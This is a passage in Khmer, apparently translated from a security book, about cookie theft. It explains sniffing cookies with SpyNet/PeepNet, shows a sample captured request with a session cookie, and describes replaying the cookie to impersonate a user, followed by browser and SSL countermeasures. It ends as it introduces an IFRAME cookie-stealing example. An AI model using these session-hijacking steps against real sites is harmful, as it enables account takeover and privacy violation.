វិធីសាស្រ្តផ្ទាល់បំផុតគឺការស្ទាក់ចាប់ cookies ដូចដែលពួកគេត្រូវបានបញ្ជូនតាមបណ្តាញ។ ទិន្នន័យ​ដែល​ស្ទាក់​ចាប់​អាច​ត្រូវ​បាន​ប្រើ​ពេល​ចូល​ទៅ​ក្នុង​ម៉ាស៊ីន​មេ​ដែល​សមស្រប។ បញ្ហានេះអាចត្រូវបានដោះស្រាយដោយប្រើឧបករណ៍ស្ទាក់ចាប់កញ្ចប់ព័ត៌មានណាមួយ ប៉ុន្តែអ្វីដែលល្អបំផុតគឺកម្មវិធីរបស់ Lavrenty Nikula ( Laurentiu Nicula) SpyNet/PeepNet. SpyNet រួមបញ្ចូលឧបករណ៍ប្រើប្រាស់ពីរដែលដំណើរការជាមួយគ្នា។ កម្មវិធី CaptureNetចាប់យកកញ្ចប់ព័ត៌មានដោយខ្លួនវា ហើយរក្សាទុកវានៅលើថាស ហើយឧបករណ៍ប្រើប្រាស់ PeepNet បើកឯកសារ ហើយបំប្លែងវាទៅជាទម្រង់មនុស្សអាចអានបាន។ ឧទាហរណ៍ខាងក្រោមគឺជាបំណែកនៃវគ្គទំនាក់ទំនងដែលបង្កើតឡើងវិញដោយ PeepNet ក្នុងអំឡុងពេលដែលខូគីបម្រើដើម្បីផ្ទៀងផ្ទាត់ និងគ្រប់គ្រងការចូលប្រើទំព័រដែលបានមើល (ឈ្មោះត្រូវបានផ្លាស់ប្តូរដើម្បីរក្សាភាពអនាមិក)។

ទទួល http://www.victim.net/images/logo.gif HTTP/1.0 ទទួល៖ */* អ្នកយោង៖ http://www.victim.net/ ម៉ាស៊ីន៖ www.victim.net Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFLRlpWTVFISEblahblah

ឧទាហរណ៍ខាងលើបង្ហាញពីបំណែកខូគីដែលដាក់ក្នុងសំណើ HTTP មកដល់ម៉ាស៊ីនមេ។ សំខាន់បំផុតគឺវាល គុយឌី =ដែលបញ្ជាក់អត្តសញ្ញាណតែមួយគត់ដែលប្រើសម្រាប់ការផ្ទៀងផ្ទាត់អ្នកប្រើប្រាស់នៅលើថ្នាំង www.victim.net ។ ចូរនិយាយថាបន្ទាប់ពីនេះ អ្នកវាយប្រហារបានចូលមើលថ្នាំងជនរងគ្រោះ.net បានទទួលឧបករណ៍កំណត់អត្តសញ្ញាណផ្ទាល់ខ្លួន និងខូគី (សន្មត់ថាថ្នាំងមិនដាក់ទិន្នន័យខូគីក្នុងសតិនិម្មិតទេ ប៉ុន្តែសរសេរវាទៅថាសរឹង)។ បន្ទាប់មក អ្នកវាយប្រហារអាចបើកខូគីផ្ទាល់ខ្លួនរបស់គាត់ ហើយជំនួស cuid=field ID ជាមួយវាពីកញ្ចប់ព័ត៌មានដែលបានចាប់យក។ ក្នុងករណីនេះ នៅពេលចូលទៅក្នុងម៉ាស៊ីនមេជនរងគ្រោះ.net គាត់នឹងត្រូវបានគេយល់ថាជាអ្នកប្រើប្រាស់ដែលទិន្នន័យខូគីត្រូវបានស្ទាក់ចាប់។

សមត្ថភាពកម្មវិធី PeepNetការចាក់ឡើងវិញនូវវគ្គទំនាក់ទំនងទាំងមូល ឬបំណែករបស់វាជួយសម្រួលយ៉ាងខ្លាំងដល់ការអនុវត្តការវាយប្រហារនៃប្រភេទនេះ។ ដោយប្រើប៊ូតុងមួយ។ ទៅយក!អ្នកអាចទៅយកទំព័រដែលអ្នកប្រើប្រាស់បានមើលឡើងវិញដោយប្រើទិន្នន័យខូគីរបស់ពួកគេដែលបានចាប់យកពីមុនដោយ CaptureNet ។ នៅក្នុងប្រអប់ឧបករណ៍ប្រើប្រាស់ PeepNet អ្នកអាចឃើញព័ត៌មានអំពីការបញ្ជាទិញដែលបានបញ្ចប់របស់នរណាម្នាក់។ វាប្រើទិន្នន័យខូគីដែលស្ទាក់ចាប់ដោយ CaptureNet សម្រាប់ការផ្ទៀងផ្ទាត់។ ចំណាំ​ស៊ុម​ដែល​មាន​ទីតាំង​នៅ​ជ្រុង​ខាង​ក្រោម​ខាង​ស្ដាំ​នៃ​ប្រអប់​ទិន្នន័យ​សម័យ និង​បន្ទាត់​ដែល​តាម​បន្ទាត់ Cookie:។ នេះគឺជាទិន្នន័យខូគីដែលប្រើសម្រាប់ការផ្ទៀងផ្ទាត់។

វា​ជា​ល្បិច​ស្អាត​ណាស់។ លើសពីនេះទៀតឧបករណ៍ប្រើប្រាស់ CaptureNetអាចផ្តល់នូវកំណត់ត្រាចរាចរណ៍ដែលបានឌិគ្រីបពេញលេញ ដែលស្ទើរតែស្មើនឹងសមត្ថភាពនៃឧបករណ៍ប្រើប្រាស់កម្រិតវិជ្ជាជីវៈដូចជា Network Associates, Inc.'s Sniffer Pro ។ ទោះយ៉ាងណាក៏ដោយឧបករណ៍ប្រើប្រាស់ SpyNetកាន់តែប្រសើរ - អ្នកអាចទទួលបានវាដោយឥតគិតថ្លៃ!

វិធានការប្រឆាំង

អ្នកគួរតែប្រយ័ត្នចំពោះគេហទំព័រដែលប្រើខូគីសម្រាប់ការផ្ទៀងផ្ទាត់ និងរក្សាទុកព័ត៌មានអត្តសញ្ញាណដែលងាយរងគ្រោះ។ ឧបករណ៍មួយដែលអាចជួយសុវត្ថិភាពគឺ Cookie Pal របស់ Kookaburra Software ដែលអាចរកបាននៅ http://www.kburra.com/cpal.html ។ ផលិតផលសូហ្វវែរនេះអាចត្រូវបានកំណត់រចនាសម្ព័ន្ធដើម្បីបង្កើតសារព្រមានដល់អ្នកប្រើប្រាស់ នៅពេលដែលគេហទំព័រព្យាយាមប្រើយន្តការខូគី។ ក្នុងករណីនេះអ្នកអាច "មើលពីក្រោយឆាក" ហើយសម្រេចចិត្តថាតើសកម្មភាពទាំងនេះគួរតែត្រូវបានអនុញ្ញាត។ Internet Explorer មានយន្តការខូគីដែលភ្ជាប់មកជាមួយ។ ដើម្បីបើកវា សូមបើកដំណើរការអាប់ភ្លេតជម្រើសអ៊ីនធឺណិតក្នុងផ្ទាំងបញ្ជា ចូលទៅកាន់ផ្ទាំងសុវត្ថិភាព ជ្រើសរើសធាតុតំបន់អ៊ីនធឺណិត កំណត់របៀបកម្រិតផ្ទាល់ខ្លួន និងសម្រាប់ទិន្នន័យខូគីអចិន្ត្រៃយ៍ និងបណ្តោះអាសន្ន កំណត់កុងតាក់ទៅប្រអប់បញ្ចូល។ ការដំឡើងការប្រើប្រាស់ខូគីនៅក្នុងកម្មវិធីរុករក Netscape ត្រូវបានធ្វើដោយប្រើពាក្យបញ្ជា កែសម្រួល › ចំណូលចិត្ត › កម្រិតខ្ពស់និងកំណត់ ព្រមានខ្ញុំ មុនពេលទទួលយកខូគី ឬបិទរបៀបខូគី (រូបភាព 16.3)។ នៅពេលអ្នកទទួលយកខូគី អ្នកត្រូវពិនិត្យមើលថាតើវាត្រូវបានសរសេរទៅថាស ហើយមើលថាតើគេហទំព័រប្រមូលព័ត៌មានអំពីអ្នកប្រើប្រាស់ដែរឬទេ។

នៅពេលចូលទៅកាន់គេហទំព័រដែលប្រើខូគីសម្រាប់ការផ្ទៀងផ្ទាត់ អ្នកត្រូវតែធានាថាឈ្មោះអ្នកប្រើ និងពាក្យសម្ងាត់ដែលអ្នកផ្តល់ដំបូងគឺយ៉ាងហោចណាស់ត្រូវបានអ៊ិនគ្រីប SSL ។ បន្ទាប់មកព័ត៌មាននេះនឹងបង្ហាញនៅក្នុងបង្អួចកម្មវិធី PeepNet យ៉ាងហោចណាស់មិនមែនក្នុងទម្រង់ជាអត្ថបទធម្មតានោះទេ។

អ្នកនិពន្ធចង់ជៀសវាងខូគីទាំងស្រុង ប្រសិនបើគេហទំព័រដែលបានចូលមើលញឹកញាប់ជាច្រើនមិនទាមទារជម្រើសនេះ។ ឧទាហរណ៍ សម្រាប់សេវាកម្ម Hotmail ដែលពេញនិយមទូទាំងពិភពលោករបស់ Microsoft ខូគីត្រូវបានទាមទារសម្រាប់ការចុះឈ្មោះ។ ដោយសារសេវាកម្មនេះប្រើម៉ាស៊ីនមេផ្សេងៗគ្នាជាច្រើនក្នុងអំឡុងពេលដំណើរការផ្ទៀងផ្ទាត់ ការបន្ថែមពួកវាទៅតំបន់គេហទំព័រដែលទុកចិត្តគឺមិនងាយស្រួលនោះទេ (ដំណើរការនេះត្រូវបានពិពណ៌នានៅក្នុងផ្នែក "ការប្រើប្រាស់តំបន់សុវត្ថិភាពដោយប្រាជ្ញា៖ ដំណោះស្រាយទូទៅចំពោះបញ្ហាត្រួតពិនិត្យសកម្ម")។ ក្នុងករណីនេះ ការកំណត់ *.hotmail.com នឹងជួយ។ ខូគីមិនមែនជាដំណោះស្រាយដ៏ល្អឥតខ្ចោះចំពោះបញ្ហានៃភាពមិនពេញលេញនៃពិធីការ HTML នោះទេ ប៉ុន្តែវិធីសាស្រ្តជំនួសហាក់ដូចជាកាន់តែអាក្រក់ (ឧទាហរណ៍ ការបន្ថែមអត្តសញ្ញាណទៅ URL ដែលអាចត្រូវបានរក្សាទុកនៅលើម៉ាស៊ីនមេប្រូកស៊ី)។ រហូតទាល់តែមានគំនិតល្អជាងនេះមក នោះជម្រើសតែមួយគត់របស់អ្នកគឺត្រូវគ្រប់គ្រងខូគីរបស់អ្នកដោយប្រើវិធីសាស្ត្រដែលបានរាយខាងលើ។

ចាប់យកខូគីតាមរយៈ URL

តោះស្រមៃមើលអ្វីដែលគួរឱ្យខ្លាច៖ អ្នកប្រើប្រាស់ Internet Explorer ចុចលើតំណខ្ពស់ដែលបង្កើតជាពិសេស ហើយក្លាយជាជនរងគ្រោះដែលអាចប្រថុយនឹងខូគីរបស់ពួកគេត្រូវបានស្ទាក់ចាប់។ Bennett Haselton ( Bennett Haselton) និង Jamie McCarthy ( Jamie McCarthy) ពីអង្គការយុវវ័យ Peacefire ដែលតស៊ូមតិដើម្បីសេរីភាពនៃការទំនាក់ទំនងតាមរយៈអ៊ីនធឺណិត បានបោះពុម្ពផ្សាយស្គ្រីបដែលនាំមកនូវគំនិតនេះដល់ជីវិត។ ស្គ្រីបនេះទាញយកខូគីពីកុំព្យូទ័រអតិថិជន នៅពេលដែលអ្នកប្រើប្រាស់របស់វាចុចលើតំណភ្ជាប់ដែលមាននៅលើទំព័រនេះ។ ជាលទ្ធផល មាតិកានៃខូគីមានសម្រាប់ប្រតិបត្តិករគេហទំព័រ។

មុខងារនេះអាចត្រូវបានប្រើប្រាស់សម្រាប់គោលបំណងមិនសមរម្យដោយបង្កប់ស្លាក IFRAME នៅក្នុង HTML នៃគេហទំព័រ អ៊ីមែល HTML ឬការបង្ហោះក្រុមព័ត៌មាន។ ឧទាហរណ៍ខាងក្រោមដែលផ្តល់ដោយទីប្រឹក្សាសន្តិសុខ Richard M. Smith បង្ហាញពីសមត្ថភាពក្នុងការប្រើប្រាស់ចំណុចទាញ IFRAME ជាមួយនឹងឧបករណ៍ប្រើប្រាស់ដែលត្រូវបានបង្កើតឡើងដោយ Peacefire ។